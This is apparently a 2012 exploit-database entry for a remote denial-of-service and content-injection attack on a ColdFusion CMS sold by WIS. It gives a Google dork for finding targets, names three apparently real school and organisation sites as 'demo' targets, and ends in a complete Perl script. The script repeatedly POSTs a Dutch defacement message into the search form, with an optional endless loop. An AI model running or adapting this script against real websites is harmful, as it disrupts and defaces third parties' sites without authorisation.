# Exploit Title: [WIS Coldfusion Exploit] # Date: [9-9-2012] # Author: [Noxxie] # Vendor or Software Link: [ http://www.wis.nl/Onze_klanten ] (link that also shows customers , gives an idea of inpact) # Version: [All versions with search form are affected] # Category:: [remote dos] # Google dork: [inurl:/Page/Nctrue] # Tested on: [linux,windows] # Demo site: [ http://www.cambium.org/Page/nctrue/sp81/index.html?Search=hello http://www.teylingen-college.nl/Page/nctrue/sp2048/Index.html http://copernicus.atlascollege.nl/Page/nctrue/action=search/index.html #!/usr/bin/perl -w #!/Made By Noxxie Version for Hackflag use Time::HiRes; use HTTP::Request::Common qw(POST); use LWP::UserAgent; system("cls"); if ($#ARGV != 3) { print "usage: target interval repetitions Persistent\n"; print "target: link to vulnerable page\n"; print "interval: interval time in seconds\n"; print "repetitions: amount of repetitions\n"; print "Persistent mode (0=off,1=on)\n"; print "example: http://www.google.nl/vulnerablepage.php 2 1 1\n"; exit; } $target = $ARGV[0]; $seconds = $ARGV[1]; $times = $ARGV[2]; $persistent = $ARGV[3]; $count = 0; $togo =0; print " ## ## ####### ## ## ## ## #### ######## \n ### ## ## ## ## ## ## ## ## ## \n #### ## ## ## ## ## ## ## ## ## \n ## ## ## ## ## ### ### ## ###### \n ## #### ## ## ## ## ## ## ## ## \n ## ### ## ## ## ## ## ## ## ## \n ## ## ####### ## ## ## ## #### ######## \n "; print"Loading\n"; Time::HiRes::sleep(0.3); print"Target: $target\n"; Time::HiRes::sleep(0.2); print"Target Set\n\n"; Time::HiRes::sleep(0.3); print"Interval: $seconds Seconds\n"; Time::HiRes::sleep(0.1); print"Interval Set\n\n"; Time::HiRes::sleep(0.2); print"Amount: $times Times\n"; Time::HiRes::sleep(0.4); print"Amount Set\n\n"; if ($persistent == 1) { print "Persistent mode is ON\n"; print "Use Cntrl+C to abort script\n" }else{ print "Persistent mode is OFF\n"; print "Script will exit automaticly after task is completed\n" } Time::HiRes::sleep(0.1); Proceed: $count = $count + 1; if( $count > $times ){ system("cls"); print "\n\n\n Job Well Done\n+----------Stats---------+\nTarget: $target\nExploited $times times\nwith an interval of : $seconds seconds\n\n See You laters :D\n\n\n\n"; Time::HiRes::sleep(3.5); exit; }else{ goto Flop; } Flop: $togo = $times - $count; $ua = LWP::UserAgent->new; my $req = POST $target, [ search => '<html><head></head><body><h1>Sites die hun content niet goed beveiligen worden gepowened door een stelletje whitehats</h1><br><p><h1>[[/]{{/True Story/}}[/]]</h1></body></html>', errors => 0 ]; print $ua->request($req)->as_string; Time::HiRes::sleep($seconds); if ($persistent != 1) { print "$count Done , $togo times to go \n"; print "\n"; } if ($persistent == 1) { goto Flop; } goto Proceed;